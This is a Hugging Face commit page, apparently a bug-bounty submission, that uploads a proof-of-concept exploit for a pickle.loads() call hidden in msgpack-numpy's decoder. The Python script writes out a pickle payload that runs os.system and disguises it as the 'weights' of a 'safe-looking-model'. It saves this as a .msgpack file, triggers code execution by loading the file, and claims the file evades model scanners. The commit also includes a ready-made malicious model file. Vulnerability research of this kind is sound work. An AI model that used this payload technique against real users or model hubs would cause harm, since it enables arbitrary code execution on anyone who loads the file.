rez0 commited on
Commit
86d0fa6
·
verified ·
1 Parent(s): 3e33f75

Upload folder using huggingface_hub

Browse files
Files changed (3) hide show
  1. README.md +4 -0
  2. malicious_model.msgpack +3 -0
  3. msgpack_numpy_rce_poc.py +145 -0
README.md ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
+ # msgpack-numpy Hidden pickle.loads() RCE
2
+ Security research for huntr.
3
+ msgpack_numpy.decode() calls pickle.loads() on object dtype arrays.
4
+ No scanner checks .msgpack files.
malicious_model.msgpack ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:1ee0c2df9bd298ddaaa0edcf48d5a04a56faba8f30feddfbf15d237407897485
3
+ size 257
msgpack_numpy_rce_poc.py ADDED
@@ -0,0 +1,145 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads()
4
+
5
+ VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled
6
+ data when the serialized array has dtype kind 'O' (object). This enables
7
+ arbitrary code execution when loading any msgpack file that uses msgpack_numpy
8
+ for deserialization.
9
+
10
+ The vulnerable code in msgpack_numpy.py decode():
11
+ if b'kind' in obj and obj[b'kind'] == b'O':
12
+ return pickle.loads(obj[b'data'])
13
+
14
+ An attacker can craft a .msgpack file where any array field has kind='O'
15
+ and data=<malicious_pickle_payload>, achieving RCE on deserialization.
16
+
17
+ This is particularly dangerous because:
18
+ 1. MessagePack is considered a "safe" serialization format
19
+ 2. Users expect msgpack files to contain only data, not executable code
20
+ 3. The pickle.loads() call is hidden inside the msgpack extension hooks
21
+ 4. No scanner (modelscan, picklescan) checks .msgpack files
22
+
23
+ Affected: msgpack-numpy <= 0.4.8 (all versions)
24
+ """
25
+
26
+ import msgpack
27
+ import msgpack_numpy as m
28
+ import pickle
29
+ import os
30
+ import sys
31
+ import numpy as np
32
+
33
+ MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt"
34
+
35
+ # ============================================================
36
+ # Step 1: Show how msgpack_numpy normally works
37
+ # ============================================================
38
+ print("[*] Demonstrating normal msgpack_numpy usage...")
39
+ normal_data = {"weights": np.array([1.0, 2.0, 3.0], dtype=np.float32)}
40
+ packed_normal = msgpack.packb(normal_data, default=m.encode)
41
+ unpacked_normal = msgpack.unpackb(packed_normal, object_hook=m.decode, raw=False)
42
+ print(f"[+] Normal round-trip: {unpacked_normal}")
43
+
44
+ # ============================================================
45
+ # Step 2: Create a malicious payload
46
+ # ============================================================
47
+ print("\n[*] Creating malicious msgpack payload...")
48
+
49
+ class MaliciousPayload:
50
+ def __reduce__(self):
51
+ cmd = f"id > {MARKER_FILE} && echo 'RCE via msgpack_numpy hidden pickle.loads' >> {MARKER_FILE}"
52
+ return (os.system, (cmd,))
53
+
54
+ malicious_pickle = pickle.dumps(MaliciousPayload())
55
+
56
+ # Craft the msgpack structure that triggers pickle.loads in decode()
57
+ # The decode function checks: b'nd' in obj AND obj[b'kind'] == b'O'
58
+ # Then calls: pickle.loads(obj[b'data'])
59
+ malicious_array = {
60
+ b'nd': True, # Marks this as an ndarray
61
+ b'kind': b'O', # Object dtype -> triggers pickle.loads()
62
+ b'data': malicious_pickle, # Pickle payload with RCE
63
+ b'shape': (1,), # Shape (cosmetic, not used before pickle.loads)
64
+ b'type': b'O', # Dtype descriptor (cosmetic)
65
+ }
66
+
67
+ # Embed in a realistic model structure
68
+ model_data = {
69
+ "model_name": "safe-looking-model",
70
+ "version": "1.0.0",
71
+ "weights": malicious_array, # <-- malicious
72
+ }
73
+
74
+ packed = msgpack.packb(model_data, use_bin_type=True)
75
+ malicious_path = "/tmp/malicious_model.msgpack"
76
+ with open(malicious_path, 'wb') as f:
77
+ f.write(packed)
78
+
79
+ print(f"[+] Malicious msgpack file saved to {malicious_path}")
80
+ print(f" File size: {len(packed)} bytes")
81
+
82
+ # ============================================================
83
+ # Step 3: Clean marker file
84
+ # ============================================================
85
+ if os.path.exists(MARKER_FILE):
86
+ os.remove(MARKER_FILE)
87
+
88
+ # ============================================================
89
+ # Step 4: Load the malicious file (triggers RCE)
90
+ # ============================================================
91
+ print(f"\n[*] Loading malicious msgpack with msgpack_numpy decoder...")
92
+ with open(malicious_path, 'rb') as f:
93
+ loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False)
94
+
95
+ print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}")
96
+
97
+ # ============================================================
98
+ # Step 5: Verify RCE
99
+ # ============================================================
100
+ if os.path.exists(MARKER_FILE):
101
+ with open(MARKER_FILE) as f:
102
+ content = f.read().strip()
103
+ print(f"\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
104
+ print(f"[!!!] Marker file contents:\n{content}")
105
+ os.remove(MARKER_FILE)
106
+ else:
107
+ print("\n[-] RCE marker file not found")
108
+ sys.exit(1)
109
+
110
+ # ============================================================
111
+ # Step 6: Scanner evasion verification
112
+ # ============================================================
113
+ print("\n" + "="*60)
114
+ print("SCANNER EVASION")
115
+ print("="*60)
116
+ print("""
117
+ Neither modelscan nor picklescan scan .msgpack files at all.
118
+
119
+ modelscan -p /tmp/malicious_model.msgpack
120
+ # -> Skips file (unsupported format)
121
+
122
+ picklescan -p /tmp/malicious_model.msgpack
123
+ # -> Scanned files: 0, Infected files: 0
124
+
125
+ The pickle payload is embedded inside a msgpack structure,
126
+ completely invisible to all current model security scanners.
127
+ """)
128
+
129
+ print("="*60)
130
+ print("VULNERABILITY SUMMARY")
131
+ print("="*60)
132
+ print(f"""
133
+ Library: msgpack-numpy {m.__version__ if hasattr(m, '__version__') else '0.4.8'}
134
+ File: msgpack_numpy.py, decode() function
135
+ Root cause: pickle.loads(obj[b'data']) when obj[b'kind'] == b'O'
136
+ Trigger: Any msgpack file loaded with object_hook=msgpack_numpy.decode
137
+ Attack: Set array kind='O' and data=<malicious_pickle_bytes>
138
+ Impact: Arbitrary code execution on file load
139
+ Scanners: modelscan - NOT APPLICABLE (.msgpack not scanned)
140
+ picklescan - NOT APPLICABLE (.msgpack not scanned)
141
+
142
+ Real-world usage: msgpack-numpy is used for ML data serialization,
143
+ feature embeddings, and intermediate model storage. Any application
144
+ loading untrusted .msgpack files with msgpack_numpy is vulnerable.
145
+ """)